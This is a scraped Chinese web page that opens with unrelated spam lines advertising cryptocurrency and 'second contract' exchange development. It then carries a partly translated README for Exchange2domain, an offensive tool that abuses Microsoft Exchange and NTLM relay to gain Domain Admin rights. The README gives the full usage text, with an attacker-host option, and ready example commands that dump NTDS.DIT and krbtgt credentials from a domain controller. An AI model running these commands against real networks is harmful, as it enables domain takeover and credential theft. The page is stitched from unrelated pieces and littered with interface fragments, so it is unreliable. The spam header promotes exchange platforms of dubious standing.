Exchange2domain
秒合约交易所开发详细丨秒合约交易所系统开发详细及规则丨秒合约交易所系统源码部署
海外版数字货币交易所系统开发(逻辑及功能)丨多语言数字货币交易所系统开发(案例及源码)
交易所开发成品丨交易所系统开发(演示版)丨交易所APP源码设计
区块链交易所开发详细丨区块链交易所系统开发(开发方案)丨区块链交易所源码案例部署
数字货币交易所开发详情版丨数字货币交易所系统开发(web3.0技术开发)丨数字货币交易所开发源码成品
交易所APP开发功能丨交易所系统开发(成熟及案例)丨交易所系统源码平台
privexchange的所有工具。你只需要打开网络服务器的端口,所以不需要很高的权限。
写得很好!滥用Exchange。离域名管理只有一个API调用。
要求
这些工具需要impacket。你可以用pip install impacket来安装它。
使用方法
usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
[--hashes HASHES] [--no-ssl]
[--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
[-ap ATTACKER_PORT] -th TARGET_HOST
[-exec-method [{smbexec,wmiexec,mmcexec}]]
[--exchange-version EXCHANGE_VERSION]
[--attacker-page ATTACKER_PAGE]
[--just-dc-user USERNAME] [--debug]
HOSTNAME
AI 代码解读
Exchange your privileges for Domain Admin privs by abusing Exchange. Use me
with ntlmrelayx
positional arguments:
HOSTNAME Hostname/ip of the Exchange server
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME
username for authentication
AI 代码解读
-d DOMAIN, --domain DOMAIN
domain the user is in (FQDN or NETBIOS domain name)
AI 代码解读
-p PASSWORD, --password PASSWORD
Password for authentication, will prompt if not
specified and no NT:NTLM hashes are supplied
AI 代码解读
--hashes HASHES LM:NLTM hashes
--no-ssl Don't use HTTPS (connects on port 80)
--exchange-port EXCHANGE_PORT
Alternative EWS port (default: 443 or 80)
AI 代码解读
-ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
Attacker hostname or IP
AI 代码解读
-ap ATTACKER_PORT, --attacker-port ATTACKER_PORT
Port on which the relay attack runs (default: 80)
AI 代码解读
-th TARGET_HOST, --target-host TARGET_HOST
Hostname or IP of the DC
AI 代码解读
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using
-use-vss). Default: smbexec
AI 代码解读
--exchange-version EXCHANGE_VERSION
Exchange version of the target (default: Exchange2013,
choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2
,Exchange2013,Exchange2013_SP1,Exchange2016)
AI 代码解读
--attacker-page ATTACKER_PAGE
Page to request on attacker server (default:
/privexchange/)
AI 代码解读
--just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified.
Only available for DRSUAPI approach.
AI 代码解读
--debug Enable debug output
example:
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
f you only want to dump krbtgt, use --just-dc-user.
example:
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
Update
Auto backup old SD for restore.
